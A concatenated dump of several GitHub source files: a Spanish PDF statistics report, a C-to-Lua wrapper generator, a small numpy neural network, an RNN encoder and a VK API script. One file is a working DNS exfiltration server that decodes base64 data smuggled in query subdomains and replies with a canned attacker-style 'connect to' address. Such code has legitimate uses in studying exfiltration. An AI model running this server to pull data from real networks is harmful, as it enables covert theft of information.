1\r\n\t\t\t\t\tself.linea = 370\r\n\t\t\t\t\tself.contlinea = 1\r\n\t\t\t\tself.imprimir_encabezado = 0\r\n\t\t\tif self.cedula_tutor != self.cedula_anterior:\r\n\t\t\t\tself.totalSecciones=1\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.cedula_anterior = self.cedula_tutor\r\n\t\t\t\t\tself.TotalTutorEstudiantes = self.TotalEstudiantes\r\n\t\t\t\t\tself.TotalTutorProyectos = self.TotalProyectos\r\n\t\t\t\t\tself.TotalTutorSInformacion = self.TotalSInformacion\r\n\t\t\t\t\tself.TotalTutorDWeb = self.TotalDWeb\r\n\t\t\t\t\tself.TotalTutorRedes = self.TotalRedes\r\n\t\t\t\t\tself.TotalTutorApps = self.TotalApps\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\telse:\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.TotalTutorEstudiantes = self.TotalTutorEstudiantes + self.TotalEstudiantes\r\n\t\t\t\t\tself.TotalTutorProyectos = self.TotalTutorProyectos + self.TotalProyectos\r\n\t\t\t\t\tself.TotalTutorSInformacion = self.TotalTutorSInformacion + self.TotalSInformacion\r\n\t\t\t\t\tself.TotalTutorDWeb = self.TotalTutorDWeb + self.TotalDWeb\r\n\t\t\t\t\tself.TotalTutorRedes = self.TotalTutorRedes + self.TotalRedes\r\n\t\t\t\t\tself.TotalTutorApps = self.TotalTutorApps + self.TotalApps\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.imprimeLineaRegistros()\r\n\t\t\t\t\tself.actualizaTotalesGenerales()\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.RegistroActual = self.RegistroActual + 1\r\n\t\t\t\r\n\t\t\tif self.contlinea >= 14:\r\n\t\t\t\tlv_pagina = lv_pagina + 1\r\n\t\t\t\tc.showPage()\r\n\t\t\t\tself.contlinea = 1\r\n\t\t\t\tself.imprimir_encabezado = 1\r\n\t\tif self.detallado == 1:\r\n\t\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\t\tself.linea = self.linea + 15\r\n\t\t\tself.cnv.drawString(35, h - self.linea, \"Totales del Tutor: \")\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalTutorRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalTutorRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\tself.linea = self.linea + 20\r\n\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\tself.linea = self.linea + 2\r\n\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\tself.linea = self.linea + 20\r\n\t\tself.cnv.drawString(35, h - self.linea, \"Totales General PNF: \")\r\n\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalGeneralEstudiantes))\r\n\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalGeneralProyectos))\r\n\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalGeneralSInformacion))\r\n\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalGeneralDWeb))\r\n\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalGeneralRedes))\r\n\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalGeneralApps))\r\n\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalGeneralEstudiantes))\r\n\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalGeneralProyectos))\r\n\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalGeneralSInformacion))\r\n\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalGeneralDWeb))\r\n\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalGeneralRedes))\r\n\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalGeneralApps))\r\n\r\n\t\tself.cnv.showPage()\r\n\t\tself.cnv.save()\r\n\t\t#Abriendo Archivo PDF\r\n\t\twb.open_new(self.archivo2)\r\n\r\n\tdef cerrar(self):\r\n\t\tself.close()\r\n\r\n\r\n# Constructor para ejecutar el modulo independiente del programa principal, descarcar para hacer pruebas\r\n\r\n#app = QApplication(sys.argv)\r\n#PEstadistica = DialogoEstadistica()\r\n#PEstadistica.show()\r\n#app.exec_()\r\n","repo_name":"amayale69/BIDIPROYECT","sub_path":"estadisticas.pyw","file_name":"estadisticas.pyw","file_ext":"pyw","file_size_in_byte":47843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4757465824","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom pprint import pprint\nfrom string import Template\nimport argparse\nimport sys, os\n\n# This is not required if you've installed pycparser into\n# your site-packages/ with setup.py\nsys.path.extend(['.', '..'])\n\nfrom pycparser import c_parser, c_ast, parse_file\n\nscriptpath = \"./codeTemplate.py\"\nsys.path.append(os.path.abspath(scriptpath))\nfrom codeTemplate import *\n\n\nclass FuncCallVisitor(c_ast.NodeVisitor):\n def __init__(self):\n # [ { name : xxx, return : xxx, params : [ { name : xxx, ref : 0 }, ...] }, ... ]\n self.functions = []\n self.typedefs = []\n self.typedefs_struct = []\n self.primitive_types = ['void', 'short','int','long','unsigned short','unsigned int', 'unsigned long']\n\n def search_typedef( self, type_name) : \n for item in self.typedefs :\n #print(item)\n if item['name'] == type_name :\n return item['type_origin']\n return 'unknown'\n\n def dump(self):\n return { 'func' : self.functions , 'typedef' : self.typedefs, 'typedef-struct' : self.typedefs_struct }\n\n def visit_FuncDecl (self, node):\n #if isinstance(node, c_ast.FuncDecl):\n # pass\n func = {}\n params = []\n # parameter\n if isinstance(node.args, c_ast.ParamList):\n unnamed_counter = 10\n for param in node.args.params :\n ptr = 0\n args_list = { 'ptr' : 0 } \n if isinstance(param, c_ast.Decl): \n # named parameter\n args_list['direction'] = param.name\n else:\n args_list['direction'] = 'in'+str(unnamed_counter) # c_ast.Typename\n unnamed_counter = unnamed_counter + 1\n\n if isinstance(param.type, c_ast.PtrDecl):\n args_list['ptr'] = 1\n args_list['type'] = ' '.join(param.type.type.type.names)\n if isinstance(param.type, c_ast.TypeDecl):\n args_list['type'] = ' '.join(param.type.type.names)\n\n params.append(args_list)\n\n func['params'] = params\n # function name\n if isinstance(node.type, c_ast.TypeDecl):\n #print(\"TypeDecl:\", node.type.declname )\n func['name'] = node.type.declname\n # return type\n if isinstance(node.type.type, c_ast.IdentifierType):\n #print(\"IdentifierType:\", node.type.type.names[0] )\n func['return'] = ' '.join(node.type.type.names)\n self.functions.append(func)\n\n def visit_TypeDecl (self, node):\n typedef = {}\n params = []\n if isinstance(node.type, c_ast.IdentifierType):\n typedef['name'] = node.declname\n typedef['type'] = ' '.join(node.type.names)\n if typedef['type'] in self.primitive_types :\n typedef['type_origin'] = typedef['type']\n else:\n # find from self.typedefs\n typedef['type_origin'] = self.search_typedef( typedef['type'] )\n self.typedefs.append(typedef)\n elif isinstance(node.type, c_ast.Struct):\n typedef['name'] = node.type.name\n for param in node.type.decls :\n params.append( { 'name' : param.type.declname ,'type' : ' '.join(param.type.type.names) })\n typedef['type'] = params\n self.typedefs_struct.append(typedef)\n typedef['type_origin'] = 'struct'\n self.typedefs.append(typedef)\n else:\n pass \n\n\n\nclass CodeGenerator ( codeTemplate ):\n def __init__ (self, symtab) :\n self.product = 'CL'\n self.product_lib_name = 'cl_calc'\n self.symtab = symtab\n self.primitive_types = ['void', 'short','int','long','unsigned short','unsigned int', 'unsigned long']\n\n def search_type(self, searchType) :\n for typedef in self.symtab['typedef'] :\n if typedef['name'] == searchType : \n if typedef['type_origin'] != 'struct' :\n return typedef['type_origin']\n else:\n return typedef['name']+'_s'\n # primitive type already. just return it\n return searchType \n \n def find_type(self, searchType) :\n if searchType in self.primitive_types :\n return 1\n for typedef in self.symtab['typedef'] :\n if typedef['name'] == searchType : \n if typedef['type_origin'] in self.primitive_types :\n return 1\n else:\n return 0\n return 0\n\n def print_pointer(self, ptr) :\n if ptr == 1 :\n return '*'\n else:\n return ''\n\n def print_void(self, ptr) :\n if ptr == 'void' :\n return ' 300; '\n else:\n return ''\n \n def print_ref(self, ptr) :\n if ptr == 1 :\n return ''\n else:\n return '&'\n\n def print_r_ref(self, ptr) :\n if ptr == 1 :\n return '&'\n else:\n return ''\n\n def print_comma(self, idx) :\n if idx == 0 :\n return ''\n else:\n return ','\n\n def print_ret(sefl, type) :\n if type == 'void' :\n return '300; (void)'\n else:\n return ''\n\n def print_getfield_stmt(self, param_name, field_name, field_type, stack_index) :\n # More can be done for field_type\n stmt = '\\n\\t\\tlua_getfield(L, '+str(stack_index)+', \"'+field_name +'\");'\n stmt = stmt + '\\n\\t\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\t\\tif( lua_type(L, -1) == LUA_TNIL ) { '+self.print_err_stmt (301) +'}'\n stmt = stmt + '\\n\\t\\t'+param_name+'.'+field_name+' = lua_tonumber(L, -1); lua_pop(L, 1);' \n stmt = stmt + '\\n\\t\\tSTACK_DUMP(L);'\n return stmt\n\n def print_setfield_stmt(self, param_name, field_name, field_type) :\n stmt = '\\n\\tlua_pushstring(L, \"'+field_name +'\"); /* push key */'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\tlua_pushnumber(L, '+param_name+'.'+field_name+'); /* push value */'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n stmt = stmt + '\\n\\tlua_settable(L, -3);'\n stmt = stmt + '\\n\\tSTACK_DUMP(L);'\n return stmt\n \n\n def print_err_stmt(sefl, errcode) :\n stmt = '\\n\\t\\t\\terrcode = 301; /* not supported types */'\n stmt = stmt +'\\n\\t\\t\\tlua_pushnumber( L, errcode );'\n stmt = stmt +'\\n\\t\\t\\tSTACK_DUMP(L);'\n stmt = stmt +'\\n\\t\\t\\treturn 1;'\n return stmt \n\n def gen_func_register(self):\n self.lib_main = open('./'+self.product.upper()+'_LUA.c', 'w') \n self.lib_wrapper = open('./'+self.product.upper()+'_LUA.include', 'w')\n\n func_list = ''\n # func\n for idx, func in enumerate(self.symtab['func']) :\n num_result = 1 # at least 1 result\n arg_list = ''\n param_list = ''\n fetch_stmt = ''\n push_stmt = ''\n func_list = func_list + '\\n\\t\\t{\"'+func['name']+'\" , l_'+func['name']+'},'\n req_counter = 1\n for idx2, param in enumerate(func['params']):\n\n \n if param['direction'].startswith('in') and not param['direction'].startswith('inout'):\n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt +'\\n\\t'+param['direction']+' = luaL_checknumber ( L, '+str(req_counter)+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt + '\\n\\tif (lua_type( L, '+str(req_counter)+' ) == LUA_TTABLE ) {'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n fetch_stmt = fetch_stmt + self.print_getfield_stmt( param['direction'], udata_member['name'], udata_member['type'], req_counter)\n fetch_stmt = fetch_stmt + '\\n\\t} else {'+self.print_err_stmt(301)+'\\n\\t}'\n req_counter = req_counter + 1\n\n if param['direction'].startswith('inout'):\n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n fetch_stmt = fetch_stmt +'\\n\\t'+param['direction']+' = luaL_checknumber ( L, '+str(req_counter)+' );'\n push_stmt = push_stmt + '\\n\\tlua_pushnumber( L, '+param['direction']+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+param['direction']+';'\n \n fetch_stmt = fetch_stmt + '\\n\\tif (lua_type( L, '+str(num_result)+' ) == LUA_TTABLE ) {'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n fetch_stmt = fetch_stmt + self.print_getfield_stmt( param['direction'], udata_member['name'], udata_member['type'], req_counter )\n fetch_stmt = fetch_stmt + '\\n\\t} else {'+self.print_err_stmt(301)+'\\n\\t}'\n\n push_stmt = push_stmt + '\\n\\tlua_newtable (L); /* create new table */'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n push_stmt = push_stmt + self.print_setfield_stmt( param['direction'], udata_member['name'], udata_member['type'])\n\n req_counter = req_counter + 1\n num_result = num_result + 1\n\n if param['direction'].startswith('out'):\n \n if self.find_type(param['type']) :\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) +param['direction']\n param_list = param_list + '\\n\\t' +param['type']+' '+ param['direction']+';'\n push_stmt = push_stmt + '\\n\\tlua_pushnumber( L, '+param['direction']+' );'\n else:\n arg_list = arg_list + self.print_comma(idx2) + self.print_r_ref(param['ptr']) + param['direction']\n param_list = param_list + '\\n\\t'+param['type']+' '+param['direction'] +';'\n \n push_stmt = push_stmt + '\\n\\tlua_newtable (L);/* create new table */'\n for udata_type in self.symtab['typedef-struct'] :\n if param['type'] == udata_type['name'] :\n for udata_member in udata_type['type'] :\n push_stmt = push_stmt + self.print_setfield_stmt( param['direction'], udata_member['name'], udata_member['type'])\n num_result = num_result + 1\n \n\n stmt = Template(self.lua_wrapper_routine).safe_substitute( dict( \\\n func_name=func['name'], \\\n num_result=num_result, \\\n arg_list=arg_list, \\\n param_list=param_list, \\\n fetch_stmt=fetch_stmt, \\\n push_stmt=push_stmt, \\\n return_stmt=self.print_ret(func['return']) \\\n ))\n self.lib_wrapper.write(stmt)\n\n stmt = Template(self.lua_c_library).safe_substitute( dict( \\\n LIB_NAME=self.product.upper(), \\\n lib_name=self.product_lib_name, \\\n func_list=func_list \\\n ))\n self.lib_main.write( stmt ) \n self.lib_main.close()\n\n self.lib_wrapper.close()\n\n def gen(self):\n self.gen_func_register()\n\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser('Scan AST & Create Symbol Table')\n argparser.add_argument('filename', help='name of file to parse')\n args = argparser.parse_args()\n\n ast = parse_file(args.filename, use_cpp=False)\n #ast.show()\n #for (child_name, child) in ast.children():\n # child.show( sys.stdout ,\n # offset= 2,\n # attrnames=True,\n # nodenames=True,\n # showcoord=True,\n # _my_node_name=child_name)\n\n v = FuncCallVisitor()\n v.visit(ast)\n #pprint(v.dump())\n\n lua = CodeGenerator( v.dump() )\n lua.gen()\n\n \n\n","repo_name":"phyunsj/lua-to-c","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":13431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23165482828","text":"#!/usr/bin/env python3\nimport argparse\nimport io\nimport re\nimport socketserver\nimport struct\nimport sys\nimport base64\n\n\nPORT = 53\nHEADER = '!HBBHHHH'\nHEADER_SIZE = struct.calcsize(HEADER)\nDOMAIN_PATTERN = re.compile('^[A-Za-z0-9\\-\\.\\_]+$')\n\nclass DNSHandler(socketserver.BaseRequestHandler):\n\n def handle(self):\n socket = self.request[1]\n data = self.request[0]\n data_stream = io.BytesIO(data)\n\n # Read header\n (request_id, header_a, header_b, qd_count, an_count, ns_count, ar_count) = struct.unpack(HEADER, data_stream.read(HEADER_SIZE))\n\n # Read questions\n questions = []\n for i in range(qd_count):\n name_parts = []\n length = struct.unpack('B', data_stream.read(1))[0]\n while length != 0:\n name_parts.append(data_stream.read(length).decode('us-ascii'))\n length = struct.unpack('B', data_stream.read(1))[0]\n name = '.'.join(name_parts)\n\n if not DOMAIN_PATTERN.match(name):\n \n print('Invalid domain received: ' + name)\n # We are only responding to exfil requests\n return\n\n (qtype, qclass) = struct.unpack('!HH', data_stream.read(4))\n\n questions.append({'name': name, 'type': qtype, 'class': qclass})\n\n # Decode the sub_domain that is our exfil message\n exfil_hello = ''\n try:\n sub_domain = name.split('.')[0]\n # Fix URL based padding\n sub_domain += '=' * (4 - len(sub_domain) % 4)\n exfil_hello = base64.urlsafe_b64decode(sub_domain).decode('us-ascii')\n except:\n # Ignore any decoding errors\n return\n \n print('Exfil: ' + exfil_hello + ' from ' + str(self.client_address[0]) + ':' + str(self.client_address[1]))\n\n # Make response (note: we don't actually care about the questions, just return our canned response)\n response = io.BytesIO()\n\n # Header\n # Response, Authoriative\n response_header = struct.pack(HEADER, request_id, 0b10000100, 0b00000000, qd_count, 1, 0, 0)\n response.write(response_header)\n\n # Questions\n for q in questions:\n # Name\n for part in q['name'].split('.'):\n response.write(struct.pack('B', len(part)))\n response.write(part.encode('us-ascii'))\n response.write(b'\\x00')\n\n # qtype, qclass\n response.write(struct.pack('!HH', q['type'], q['class']))\n\n # Answer is always to decode and return the exfil based DNS name.\n # Normally, an attacker might reply with server:port to send exfil data\n answer = exfil_hello + \". Server reply: connect to 11.22.33.44:5678\"\n response.write(b'\\xc0\\x0c') # Compressed name (pointer to question)\n response.write(struct.pack('!HH', 16, 1)) # type: TXT, class: IN\n response.write(struct.pack('!I', 0)) # TTL: 0\n response.write(struct.pack('!H', len(answer) + 1)) # Record length\n response.write(struct.pack('B', len(answer))) # TXT length\n response.write(answer.encode('us-ascii')) # Text\n\n # Send response\n socket.sendto(response.getvalue(), self.client_address)\n\nif __name__ == '__main__':\n server = socketserver.ThreadingUDPServer(('', PORT), DNSHandler)\n print('Running on port %d' % PORT)\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n server.shutdown()\n","repo_name":"kengraf/DNSexfil","sub_path":"dns_exfil_server.py","file_name":"dns_exfil_server.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23827895331","text":"import numpy as np\nimport pickle\nimport math\nimport cv2\n\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\n\ndef sigmoid_prime(x):\n s = sigmoid(x)\n return s * (1-s) # derivative of sigmoid\n\n\nclass Network:\n\n def __init__(self, layer_sizes=None):\n if layer_sizes is None:\n layer_sizes = [784, 28, 20, 10]\n # create arrays to hold weights and biases\n self.w = [np.empty([layer_sizes[i-1], layer_sizes[i]]) for i in range(1, len(layer_sizes))]\n self.b = [np.empty(layer_sizes[i]) for i in range(1, len(layer_sizes))]\n\n def randomize_parameters(self):\n for n, (w, b) in enumerate(zip(self.w, self.b)):\n self.w[n] = np.random.rand(len(w), len(w[0]))\n self.b[n] = np.random.rand(len(b))\n\n def save_parameters(self, base_dir: str, file_name=\"params.byte\"):\n with open(base_dir + file_name, 'wb') as f:\n for w, b in zip(self.w, self.b):\n temp = w.dumps()\n f.write(len(temp).to_bytes(4, byteorder=\"big\"))\n f.write(w.dumps())\n temp = b.dumps()\n f.write(len(temp).to_bytes(4, byteorder=\"big\"))\n f.write(b.dumps())\n\n def read_parameters(self, base_dir: str, file_name=\"params.byte\"):\n with open(base_dir + file_name, 'rb') as f:\n for i in range(len(self.w)):\n temp = int.from_bytes(f.read(4), byteorder=\"big\")\n self.w[i] = pickle.loads(f.read(temp))\n temp = int.from_bytes(f.read(4), byteorder=\"big\")\n self.b[i] = pickle.loads(f.read(temp))\n\n def back_prop(self, images, expected_predictions):\n assert len(images) == len(expected_predictions)\n\n print(\"||||||||||||||||||||||||||||\")\n print(\"Cost @ Start: \", self.compute_cost(images, expected_predictions))\n\n for img, expected_prediction in zip(images, expected_predictions):\n y = [1 if i == expected_prediction else 0 for i in range(10)]\n\n # compute activation (a) of each layer (z --> before sigmoid application to a)\n z = [np.ndarray.astype(np.ndarray.flatten(img), dtype=float) / 255]\n a = z.copy() # no need to apply sigmoid before first layer\n for w, b in zip(self.w, self.b):\n z.append(np.add(np.matmul(a[-1], w), b)) # compute weighted sum from previous layer\n a.append(np.array([sigmoid(z_q) for z_q in z[-1]])) # activation value after applying sigmoid\n\n # allocate space to hold gradient - represent optimal change\n g_w, g_b = [np.empty_like(w) for w in self.w], [np.empty_like(b) for b in self.b]\n\n # allocate space to hold partial derivatives of cost with respect to all activation values\n dc_da = [np.empty_like(a_l) for a_l in a]\n\n # compute partial derivatives of cost with respect to activation values in final layer\n dc_da[-1] = [2 * (a_i - y_i) for a_i, y_i in zip(a[-1], y)]\n\n # compute the gradient via back-propagation through layers\n for l in range(len(a) - 1, 0, -1):\n # compute gradient with respect to biases\n for i, (dc_da_i, z_i) in enumerate(zip(dc_da[l], z[l])):\n g_b[l - 1][i] = dc_da_i * sigmoid_prime(z_i)\n\n # compute gradient with respect to weights\n for k, a_k in enumerate(a[l - 1]):\n for i, (g_b_i) in enumerate(g_b[l - 1]):\n g_w[l - 1][k][i] = g_b_i * a_k\n\n # compute gradient with respect to activations of previous layers - needed for next iteration\n for k in range(len(dc_da[l - 1])):\n # must sum of overall connected activations in current layer\n dc_da[l - 1][k] = 0\n for dc_da_i, g_b_i, w_ki in zip(dc_da[l], g_b[l - 1], self.w[l - 1][k]):\n dc_da[l - 1][k] += g_b_i * w_ki\n\n # change weights and biases in direction of negative gradient\n for w, b, g_w, g_b in zip(self.w, self.b, g_w, g_b):\n # change biases\n for i, g_b_i in enumerate(g_b):\n b[i] -= g_b_i / len(images)\n\n # change weights\n for r, g_w_r in enumerate(g_w):\n for c, g_w_rc in enumerate(g_w_r):\n w[r][c] -= g_w_rc / len(images)\n\n print(\"Cost @ End: \", self.compute_cost(images, expected_predictions))\n\n def compute_output(self, img):\n assert len(img) == len(img[0]) == 28\n\n output = np.ndarray.astype(np.ndarray.flatten(img), dtype=float)\n output /= 255 # normalize pixel values\n\n for w, b in zip(self.w, self.b):\n output = np.add(np.matmul(output, w), b) # compute weighted sum\n for i, o in enumerate(output):\n output[i] = sigmoid(o) # apply sigmoid function\n\n return output\n\n def compute_prediction(self, img):\n return max(self.compute_output(img))\n\n def compute_cost(self, images, expected_predictions):\n assert len(images) == len(expected_predictions)\n\n y = [[1 if i == p else 0 for i in range(10)] for p in expected_predictions]\n a = [self.compute_output(img) for img in images]\n # compute cost (sum of squares) averaged over all images\n return sum([sum([(a_i - y_i) ** 2 for a_i, y_i in zip(a_n, y_n)]) for a_n, y_n in zip(a, y)]) / len(images)\n","repo_name":"pateldeev/MNIST_NeuralNetwork","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16040224212","text":"from unicodedata import name\nimport requests\nimport json\n\n#Настоящий токен заменен на \"ваш_токен\" в целях безопасности.\n# id моих сообществ можно найти в файле 'communities.json'\n\nurl = 'https://api.vk.com/method/groups.get?v=5.131&access_token=ваш_токен'\ncommunities = requests.get(url)\njson_communities = communities.json()\n#print(json_communities)\ninside_response = json_communities.get('response')\nresponse_items = inside_response.get('items')\ncommunities_object = {'communities': response_items}\nprint(response_items)\nwith open('communities.json', 'w', encoding='utf-8') as a:\n json.dump(communities_object, a)\n","repo_name":"Karadesh/Parsing_internet","sub_path":"lesson_1/Second_parse_vk.py","file_name":"Second_parse_vk.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"466159858","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file rnn.py\n# \\author chenghuige \n# \\date 2016-12-23 14:02:57.513674\n# \\Description \n# ==============================================================================\n\n\"\"\"\nrnn encoding\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom melt.ops import dynamic_last_relevant\n\nimport copy\n \nclass EncodeMethod:\n forward = 0\n backward = 1\n bidrectional = 2 \n bidrectional_sum = 3\n\nclass OutputMethod:\n sum = 0\n last = 1\n first = 2\n all = 3\n\ndef forward_encode(cell, inputs, sequence_length, initial_state=None, dtype=None, output_method=OutputMethod.last):\n outputs, state = tf.nn.dynamic_rnn(\n cell, \n inputs, \n initial_state=initial_state, \n dtype=dtype,\n sequence_length=sequence_length)\n \n #--seems slower convergence and not good result when only using last output, so change to use sum\n if output_method == OutputMethod.sum:\n return tf.reduce_sum(outputs, 1), state\n elif output_method == OutputMethod.last:\n return dynamic_last_relevant(outputs, sequence_length), state\n elif output_method == OutputMethod.first:\n return outputs[:, 0, :], state\n else:\n return outputs, state\n\ndef backward_encode(cell, inputs, sequence_length, initial_state=None, dtype=None, output_method=OutputMethod.last):\n outputs, state = tf.nn.dynamic_rnn(\n cell, \n tf.reverse_sequence(inputs, sequence_length, 1), \n initial_state=initial_state, \n dtype=dtype,\n sequence_length=sequence_length)\n\n #--seems slower convergence and not good result when only using last output, so change to use sum\n if output_method == OutputMethod.sum:\n return tf.reduce_sum(outputs, 1), state\n elif output_method == OutputMethod.last:\n return dynamic_last_relevant(outputs, sequence_length), state\n elif output_method == OutputMethod.first:\n return outputs[:, 0, :], state\n else:\n return outputs, state\n\ndef bidrectional_encode(cell_fw, \n cell_bw, \n inputs, \n sequence_length, \n initial_state_fw=None, \n initial_state_bw=None, \n dtype=None,\n output_method=OutputMethod.last,\n use_sum=False):\n if cell_bw is None:\n cell_bw = copy.deepcopy(cell_fw)\n if initial_state_bw is None:\n initial_state_bw = initial_state_fw\n\n outputs, states = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cell_fw,\n cell_bw=cell_bw,\n inputs=inputs,\n initial_state_fw=initial_state_fw,\n initial_state_bw=initial_state_bw,\n dtype=dtype,\n sequence_length=sequence_length)\n\n output_fws, output_bws = outputs\n\n if output_method == OutputMethod.sum:\n output_forward = tf.reduce_sum(output_fws, 1) \n elif output_method == OutputMethod.last:\n output_forward = dynamic_last_relevant(output_fws, sequence_length)\n elif output_method == OutputMethod.first:\n output_forward = output_fws[:, 0, :]\n else:\n output_forward = output_fws\n\n if output_method == OutputMethod.sum:\n output_backward = tf.reduce_sum(output_bws, 1) \n elif output_method == OutputMethod.last:\n output_backward = dynamic_last_relevant(output_bws, sequence_length)\n elif output_method == OutputMethod.first:\n output_backward = output_bws[:, 0, :]\n else:\n output_backward = output_bws\n\n if use_sum:\n output = output_forward + output_backward\n else:\n output = tf.concat(-1, [output_forward, output_backward])\n\n return output, states[0]\n\ndef encode(cell, \n inputs, \n sequence_length, \n initial_state=None, \n cell_bw=None, \n inital_state_bw=None, \n dtype=None,\n encode_method=EncodeMethod.forward, \n output_method=OutputMethod.last):\n \n #needed for bidirectional_dynamic_rnn and backward method\n #without it Input 'seq_lengths' of 'ReverseSequence' Op has type int32 that does not match expected type of int64.\n #int tf.reverse_sequence seq_lengths: A `Tensor` of type `int64`.\n if initial_state is None and dtype is None:\n dtype = tf.float32\n sequence_length = tf.cast(sequence_length, tf.int64)\n if encode_method == EncodeMethod.forward:\n return forward_encode(cell, inputs, sequence_length, initial_state, dtype, output_method)\n elif encode_method == EncodeMethod.backward:\n return backward_encode(cell, inputs, sequence_length, initial_state, dtype, output_method)\n elif encode_method == EncodeMethod.bidrectional:\n return bidrectional_encode(cell, cell_bw, inputs, sequence_length, \n initial_state, inital_state_bw, dtype, output_method)\n elif encode_method == EncodeMethod.bidrectional_sum:\n return bidrectional_encode(cell, cell_bw, inputs, sequence_length, \n initial_state, inital_state_bw, dtype, output_method,\n use_sum=True)\n else:\n raise ValueError('Unsupported rnn encode method:', encode_method)","repo_name":"fword/hasky","sub_path":"util/melt/rnn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34793760885","text":"import keras.backend as K\nfrom fastapi.encoders import jsonable_encoder\nimport retinopathy\nimport cardiac\nimport malaria\n\n\ndef predict(model, 